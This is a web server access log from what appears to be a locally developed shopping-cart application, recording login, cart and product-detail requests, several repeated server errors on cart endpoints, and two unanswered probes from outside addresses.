0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:50:21 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-6 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:50:24 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6368 http-bio-8080-exec-7 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:51:09 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6368 http-bio-8080-exec-3 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:51:38 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6372 http-bio-8080-exec-8 115
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:51:48 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6370 http-bio-8080-exec-9 265
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:52:12 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6364 http-bio-8080-exec-10 98
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:52:38 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4703 http-bio-8080-exec-1 82
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:52:38 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 28
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:52:50 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-1 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:53:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4703 http-bio-8080-exec-1 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:53:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 16
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:55:55 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5261 http-bio-8080-exec-8 23
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:55:55 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-8 16
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:02 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-8 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:03 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-8 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:06 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 9723 http-bio-8080-exec-8 96
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:20 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4703 http-bio-8080-exec-9 136
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:20 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 37
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:23 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4703 http-bio-8080-exec-9 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:23 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:29 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4703 http-bio-8080-exec-9 7
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:29 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:29 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4703 http-bio-8080-exec-9 7
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:29 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:30 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4703 http-bio-8080-exec-9 7
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:30 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:40 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-9 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:48 +0800] "GET /eswz/detailGoods?goodsid=2 HTTP/1.1" 200 5261 http-bio-8080-exec-9 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:48 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:49 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-4 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:51 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-4 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:52 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4703 http-bio-8080-exec-4 13
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:52 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 20
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:57 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4703 http-bio-8080-exec-4 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:56:57 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:57:00 +0800] "GET /eswz/detailGoods?goodsid=6 HTTP/1.1" 200 5305 http-bio-8080-exec-4 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:57:00 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:57:01 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-4 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:57:02 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-4 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:57:05 +0800] "GET /eswz/detailGoods?goodsid=6 HTTP/1.1" 200 5305 http-bio-8080-exec-4 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:57:05 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 18
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:57:07 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4962 http-bio-8080-exec-4 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:21:57:07 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-4 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:04:47 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:04:47 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 51
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:04:48 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 635
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:04:51 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:04:56 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:04:58 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 37
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:04:59 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4962 http-bio-8080-exec-8 698
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:04:59 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 24
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:05:04 +0800] "GET /eswz/deleteCart?goodsid= HTTP/1.1" 500 4113 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:03 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:03 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 35
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:04 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 494
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:06 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:11 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:12 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:14 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4962 http-bio-8080-exec-8 23
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:14 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:16 +0800] "GET /eswz/deleteCart?goodsid= HTTP/1.1" 500 4113 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:25 +0800] "GET /eswz/detailGoods?goodsid=6 HTTP/1.1" 200 5305 http-bio-8080-exec-2 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:25 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-2 24
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:27 +0800] "GET /eswz/detailGoods?goodsid=3 HTTP/1.1" 200 5051 http-bio-8080-exec-2 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:27 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-2 31
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:28 +0800] "GET /eswz/insertCart HTTP/1.1" 200 77 http-bio-8080-exec-2 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:06:29 +0800] "GET /eswz/ShoopingCart HTTP/1.1" 404 985 http-bio-8080-exec-2 5
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:08 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:08 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 38
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:08 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 487
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:10 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:16 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:17 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 27
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:18 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5227 http-bio-8080-exec-8 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:18 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:19 +0800] "GET /eswz/deleteCart?goodsid= HTTP/1.1" 500 4113 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:26 +0800] "GET /eswz/detailGoods?goodsid=1 HTTP/1.1" 200 5048 http-bio-8080-exec-2 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:26 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-2 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:27 +0800] "GET /eswz/insertCart HTTP/1.1" 200 77 http-bio-8080-exec-2 15
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:07:29 +0800] "GET /eswz/ShoppingCart HTTP/1.1" 404 985 http-bio-8080-exec-2 6
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:20 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:20 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 42
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:21 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 592
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:22 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:27 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:29 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 34
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:31 +0800] "GET /eswz/detailGoods?goodsid=4 HTTP/1.1" 200 5039 http-bio-8080-exec-8 16
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:32 +0800] "GET /eswz/insertCart HTTP/1.1" 200 72 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:33 +0800] "GET /eswz/getCart HTTP/1.1" 500 5047 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:42 +0800] "GET /eswz/detailGoods?goodsid=7 HTTP/1.1" 200 4901 http-bio-8080-exec-2 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:42 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-2 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:43 +0800] "GET /eswz/insertCart HTTP/1.1" 200 72 http-bio-8080-exec-2 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:44 +0800] "GET /eswz/getCart HTTP/1.1" 500 5047 http-bio-8080-exec-2 3
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:54 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 6031 http-bio-8080-exec-3 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:54 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-3 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:08:58 +0800] "GET /eswz/deleteCart?goodsid=7 HTTP/1.1" 500 4113 http-bio-8080-exec-3 5
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:09:06 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 6031 http-bio-8080-exec-7 19
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:09:06 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:09:07 +0800] "GET /eswz/deleteCart?goodsid=7 HTTP/1.1" 500 4113 http-bio-8080-exec-10 3
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:09:11 +0800] "GET /eswz/deleteCart?goodsid=7 HTTP/1.1" 500 4113 http-bio-8080-exec-1 3
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:09:13 +0800] "GET /eswz/deleteCart?goodsid=7 HTTP/1.1" 500 4113 http-bio-8080-exec-5 3
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:09:16 +0800] "GET /eswz/deleteCart?goodsid=7 HTTP/1.1" 500 4113 http-bio-8080-exec-6 3
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:09:19 +0800] "GET /eswz/deleteCart?goodsid=7 HTTP/1.1" 500 4113 http-bio-8080-exec-2 3
44.211.176.102 - - [19/Nov/2022:22:13:01 +0800] "POST /tmUnblock.cgi HTTP/1.1" 404 - http-bio-8080-exec-3 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:14:12 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 3901 http-bio-8080-exec-10 784
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:14:13 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:23:58 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:23:59 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 46
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:23:59 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 724
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:24:01 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:24:05 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:24:06 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 24
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:24:07 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 10851 http-bio-8080-exec-8 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:26:42 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:26:42 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 33
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:26:43 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 899
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:26:44 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:26:50 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:26:51 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 27
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:26:52 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 10851 http-bio-8080-exec-8 22
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:28:15 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:28:15 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 41
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:28:16 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 703
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:28:18 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:28:24 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:28:25 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:28:29 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 10851 http-bio-8080-exec-8 27
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:30:22 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:30:22 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 56
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:30:23 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 543
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:30:25 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:30:30 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:30:31 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 28
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:30:32 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 12328 http-bio-8080-exec-8 30
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:36:20 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:36:20 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 36
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:36:21 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 716
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:36:23 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:36:28 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:36:29 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 25
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:36:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 10851 http-bio-8080-exec-8 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:36:40 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 10851 http-bio-8080-exec-2 17
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:42:01 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:42:01 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 36
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:42:02 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 828
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:42:08 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:42:13 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:42:15 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 28
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:42:16 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4715 http-bio-8080-exec-8 567
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:42:16 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 28
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:53:48 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:53:48 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-1 4
0:0:0:0:0:0:0:1 - - [19/Nov/2022:22:53:48 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-1 39
193.118.53.210 - - [19/Nov/2022:23:00:45 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-7 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:15 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:15 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 54
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:15 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 642
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:17 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:24 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:25 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 37
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:26 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 19331 http-bio-8080-exec-8 26
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:56 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:56 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 41
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:57 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 505
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:05:58 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:08 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:10 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:11 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 19342 http-bio-8080-exec-8 23
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:39 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:40 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 38
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:40 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 513
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:43 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:49 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:50 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 29
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:06:51 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 12905 http-bio-8080-exec-8 21
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:11:27 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:11:27 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 54
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:11:28 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 706
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:11:30 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:11:35 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-8 12
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:11:36 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-9 27
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:11:37 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6270 http-bio-8080-exec-10 550
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:16:19 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:16:19 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 38
0:0:0:0:0:0:0:1 - - [19/Nov/2022:23:16:21 +0800] "GET /eswz/index HTTP/1.1" 200 16540 http-bio-8080-exec-4 1413
